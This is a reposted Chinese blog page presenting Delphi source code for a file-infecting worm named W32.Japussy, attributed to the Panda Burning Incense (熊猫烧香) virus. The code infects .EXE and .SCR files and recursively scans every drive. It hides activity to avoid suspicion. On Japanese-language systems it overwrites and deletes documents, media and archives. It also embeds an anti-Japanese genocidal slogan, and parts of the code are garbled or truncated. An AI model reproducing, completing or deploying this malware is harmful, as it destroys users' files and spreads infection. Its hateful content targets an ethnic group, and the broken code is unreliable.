熊猫烧香源代码(转载)
生活随笔
收集整理的這篇文章主要介紹了
熊猫烧香源代码(转载)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
?
program?Japussy;uses
Windows,?SysUtils,?Classes,?Graphics,?ShellAPI{,?Registry};
const
HeaderSize?=?82432;?//病毒體的大小
IconOffset?=?$12EB8;?//PE文件主圖標的偏移量
//在我的Delphi5?SP1上面編譯得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六進制字符串可以找到主圖標的偏移量
{
HeaderSize?=?38912;?//Upx壓縮過病毒體的大小
IconOffset?=?$92BC;?//Upx壓縮過PE文件主圖標的偏移量
//Upx?1.24W?用法:?upx?-9?--8086?Japussy.exe
}
IconSize?=?$2E8;?//PE文件主圖標的大小--744字節
IconTail?=?IconOffset?+?IconSize;?//PE文件主圖標的尾部
ID?=?$44444444;?//感染標記
//垃圾碼,以備寫入
Catchword?=?'If?a?race?need?to?be?killed?out,?it?must?be?Yamato.?'?+
'If?a?country?need?to?be?destroyed,?it?must?be?Japan!?'?+
'***?W32.Japussy.Worm.A?***';
{$R?*.RES}
Function?RegisterServiceProcess()function?RegisterServiceProcess(dwProcessID,?dwType:?Integer):?Integer;
stdcall;?external?'Kernel32.dll';?//函數聲明
var
TmpFile:?string;
Si:?STARTUPINFO;
Pi:?PROCESS_INFORMATION;
IsJap:?Boolean?=?False;?//日文操作系統標記
{?判斷是否為Win9x?}
Function?IsWin9x()function?IsWin9x:?Boolean;
var
Ver:?TOSVersionInfo;
begin
Result?:=?False;
Ver.dwOSVersionInfoSize?:=?SizeOf(TOSVersionInfo);
if?not?GetVersionEx(Ver)?then
Exit;
if?(Ver.dwPlatformID?=?VER_PLATFORM_WIN32_WINDOWS)?then?//Win9x
Result?:=?True;
end;
{?在流之間復制?}
procedure?CopyStream(Src:?TStream;?sStartPos:?Integer;?Dst:?TStream;
dStartPos:?Integer;?Count:?Integer);
var
sCurPos,?dCurPos:?Integer;
begin
sCurPos?:=?Src.Position;
dCurPos?:=?Dst.Position;
Src.Seek(sStartPos,?0);
Dst.Seek(dStartPos,?0);
Dst.CopyFrom(Src,?Count);
Src.Seek(sCurPos,?0);
Dst.Seek(dCurPos,?0);
end;
{?將宿主文件從已感染的PE文件中分離出來,以備使用?}
procedure?ExtractFile(FileName:?string);
var
sStream,?dStream:?TFileStream;
begin
try
sStream?:=?TFileStream.Create(ParamStr(0),?fmOpenRead?or?fmShareDenyNone);
try
dStream?:=?TFileStream.Create(FileName,?fmCreate);
try
sStream.Seek(HeaderSize,?0);?//跳過頭部的病毒部分
dStream.CopyFrom(sStream,?sStream.Size?-?HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{?填充STARTUPINFO結構?}
procedure?FillStartupInfo(var?Si:?STARTUPINFO;?State:?Word);
begin
Si.cb?:=?SizeOf(Si);
Si.lpReserved?:=?nil;
Si.lpDesktop?:=?nil;
Si.lpTitle?:=?nil;
Si.dwFlags?:=?STARTF_USESHOWWINDOW;
Si.wShowWindow?:=?State;
Si.cbReserved2?:=?0;
Si.lpReserved2?:=?nil;
end;
{?發帶毒郵件?}
procedure?SendMail;
begin
//哪位仁兄愿意完成之?
end;
{?感染PE文件?}
procedure?InfectOneFile(FileName:?string);
var
HdrStream,?SrcStream:?TFileStream;
IcoStream,?DstStream:?TMemoryStream;
iID:?LongInt;
aIcon:?TIcon;
Infected,?IsPE:?Boolean;
i:?Integer;
Buf:?array[0..1]?of?Char;
begin
try?//出錯則文件正在被使用,退出
if?CompareText(FileName,?'JAPUSSY.EXE')?=?0?then?//是自己則不感染
Exit;
Infected?:=?False;
IsPE?:=?False;
SrcStream?:=?TFileStream.Create(FileName,?fmOpenRead);
try
for?i?:=?0?to?$108?do?//檢查PE文件頭
begin
SrcStream.Seek(i,?soFromBeginning);
SrcStream.Read(Buf,?2);
if?(Buf[0]?=?#80)?and?(Buf[1]?=?#69)?then?//PE標記
begin
IsPE?:=?True;?//是PE文件
Break;
end;
end;
SrcStream.Seek(-4,?soFromEnd);?//檢查感染標記
SrcStream.Read(iID,?4);
if?(iID?=?ID)?or?(SrcStream.Size
{?將目標文件寫入垃圾碼后刪除?}
procedure?SmashFile(FileName:?string);
var
FileHandle:?Integer;
i,?Size,?Mass,?Max,?Len:?Integer;
begin
try
SetFileAttributes(PChar(FileName),?0);?//去掉只讀屬性
FileHandle?:=?FileOpen(FileName,?fmOpenWrite);?//打開文件
try
Size?:=?GetFileSize(FileHandle,?nil);?//文件大小
i?:=?0;
Randomize;
Max?:=?Random(15);?//寫入垃圾碼的隨機次數
if?Max?16)?and?(SearchRec.Name?'.')?and
(SearchRec.Name?'..')?then
Result?:=?0?//不是目錄
else?if?(SearchRec.Attr?=?16)?and?(SearchRec.Name?'.')?and
(SearchRec.Name?'..')?then
Result?:=?1?//不是根目錄
else?Result?:=?2;?//是根目錄
end;
begin
if?(FindFirst(Path?+?Mask,?faAnyFile,?SearchRec)?=?0)?then
begin
repeat
PeekMessage(Msg,?0,?0,?0,?PM_REMOVE);?//調整消息隊列,避免引起懷疑
if?IsValidDir(SearchRec)?=?0?then
begin
Fn?:=?Path?+?SearchRec.Name;
Ext?:=?UpperCase(ExtractFileExt(Fn));
if?(Ext?=?'.EXE')?or?(Ext?=?'.SCR')?then
begin
InfectOneFile(Fn);?//感染可執行文件
end
else?if?(Ext?=?'.HTM')?or?(Ext?=?'.HTML')?or?(Ext?=?'.ASP')?then
begin
//感染HTML和ASP文件,將Base64編碼后的病毒寫入
//感染瀏覽此網頁的所有用戶
//哪位大兄弟愿意完成之?
end
else?if?Ext?=?'.WAB'?then?//Outlook地址簿文件
begin
//獲取Outlook郵件地址
end
else?if?Ext?=?'.ADC'?then?//Foxmail地址自動完成文件
begin
//獲取Foxmail郵件地址
end
else?if?Ext?=?'IND'?then?//Foxmail地址簿文件
begin
//獲取Foxmail郵件地址
end
else
begin
if?IsJap?then?//是倭文操作系統
begin
if?(Ext?=?'.DOC')?or?(Ext?=?'.XLS')?or?(Ext?=?'.MDB')?or
(Ext?=?'.MP3')?or?(Ext?=?'.RM')?or?(Ext?=?'.RA')?or
(Ext?=?'.WMA')?or?(Ext?=?'.ZIP')?or?(Ext?=?'.RAR')?or
(Ext?=?'.MPEG')?or?(Ext?=?'.ASF')?or?(Ext?=?'.JPG')?or
(Ext?=?'.JPEG')?or?(Ext?=?'.GIF')?or?(Ext?=?'.SWF')?or
(Ext?=?'.PDF')?or?(Ext?=?'.CHM')?or?(Ext?=?'.AVI')?then
SmashFile(Fn);?//摧毀文件
end;
end;
end;
//感染或刪除一個文件后睡眠200毫秒,避免CPU占用率過高引起懷疑
Sleep(200);
until?(FindNext(SearchRec)?0);
end;
FindClose(SearchRec);
SubDir?:=?TStringList.Create;
if?(FindFirst(Path?+?'*.*',?faDirectory,?SearchRec)?=?0)?then
begin
repeat
if?IsValidDir(SearchRec)?=?1?then
SubDir.Add(SearchRec.Name);
until?(FindNext(SearchRec)?0);
end;
FindClose(SearchRec);
Count?:=?SubDir.Count?-?1;
for?i?:=?0?to?Count?do
LoopFiles(Path?+?SubDir.Strings?+?'',?Mask);
FreeAndNil(SubDir);
end;
{?遍歷磁盤上所有的文件?}
procedure?InfectFiles;
var
DriverList:?string;
i,?Len:?Integer;
begin
if?GetACP?=?932?then?//日文操作系統
IsJap?:=?True;?//去死吧!
DriverList?:=?GetDrives;?//得到可寫的磁盤列表
Len?:=?Length(DriverList);
while?True?do?//死循環
begin
for?i?:=?Len?downto?1?do?//遍歷每個磁盤驅動器
LoopFiles(DriverList?+?':',?'*.*');?//感染之
SendMail;?//發帶毒郵件
Sleep(1000?*?60?*?5);?//睡眠5分鐘
end;
end;
{?主程序開始?}
begin
if?IsWin9x?then?//是Win9x
RegisterServiceProcess(GetCurrentProcessID,?1)?//注冊為服務進程
else?//WinNT
begin
//遠程線程映射到Explorer進程
//哪位兄臺愿意完成之?
end;
//如果是原始病毒體自己
if?CompareText(ExtractFileName(ParamStr(0)),?'Japussy.exe')?=?0?then
InfectFiles?//感染和發郵件
else?//已寄生于宿主程序上了,開始工作
begin
TmpFile?:=?ParamStr(0);?//創建臨時文件
Delete(TmpFile,?Length(TmpFile)?-?4,?4);
TmpFile?:=?TmpFile?+?#32?+?'.exe';?//真正的宿主文件,多一個空格
ExtractFile(TmpFile);?//分離之
FillStartupInfo(Si,?SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile),?PChar(TmpFile),?nil,?nil,?True,
0,?nil,?'.',?Si,?Pi);?//創建新進程運行之
InfectFiles;?//感染和發郵件
end;
end
轉載于:https://www.cnblogs.com/salonliudong/archive/2007/04/13/712171.html
總結
以上是生活随笔為你收集整理的熊猫烧香源代码(转载)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: jenkins部署java项目(五)
- 下一篇: [原]反射学习整理